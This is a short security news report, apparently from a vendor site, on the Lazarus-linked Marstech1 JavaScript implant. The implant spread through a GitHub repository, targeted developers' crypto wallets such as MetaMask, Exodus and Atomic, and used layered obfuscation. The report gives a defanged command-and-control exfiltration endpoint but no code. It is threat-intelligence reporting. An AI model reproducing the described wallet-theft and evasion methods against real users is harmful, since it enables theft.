HQ/EMEAFind out how we can help your business
The notorious North Korean-backed Lazarus hacking group is the alleged operator of the previously unreported JavaScript implant known as Marstech1.
This new campaign is part of an alleged restricted targeted attack on developers. Moreover, researchers dubbed the active operation Marstech Mayhem. The malware is delivered via an open-source repository hosted on GitHub and associated with a profile named “SuccessFriend.”
The profile, which has been active since July 2024, is no longer accessible on the code hosting platform.
The Marstech1 implant can be placed in webpages and packages.
Studies show that the Marstech1 implant is intended to capture system information. However, the researchers also noticed that it can be inserted in webpages and NPM packages, creating a supply chain risk.
In addition, evidence indicates that the malware first appeared in late December last year. As of now, at least 233 verified victims have been identified from the attack in various continents, including the US, Europe, and Asia.
The profile mentioned web development abilities and blockchain learning aligned with Lazarus’ interests. The threat actor committed both pre-obfuscated and obfuscated payloads to different GitHub repositories.
However, the implant in the GitHub repository differs from the version provided directly from the command-and-control (C2) server, implying that it is still in active development.
Its primary purpose is to search through Chromium-based browser folders on various operating systems and modify extension-related settings, especially those linked to the MetaMask Bitcoin wallet. It can also download additional payloads from the same host over port 3001.
Other wallets targeted by the malware include Exodus and Atomic for Windows, Linux, and macOS. The collected data is subsequently exfiltrated to the command-and-control endpoint “74.119.194[.]129:3000/uploads.”
The Marstech1 implant employs layered obfuscation techniques ranging from control flow flattening and dynamic variable renaming in JavaScript to multi-stage XOR decryption in Python. This detail highlights the threat actor’s sophisticated approach to evading static and dynamic analysis.
This development comes after reports of an attack on at least three cryptocurrency-related firms, including a market-making company, an online casino, and a software development company. Lastly, this campaign was allegedly part of the Contagious Interview operation between October and November 2024.
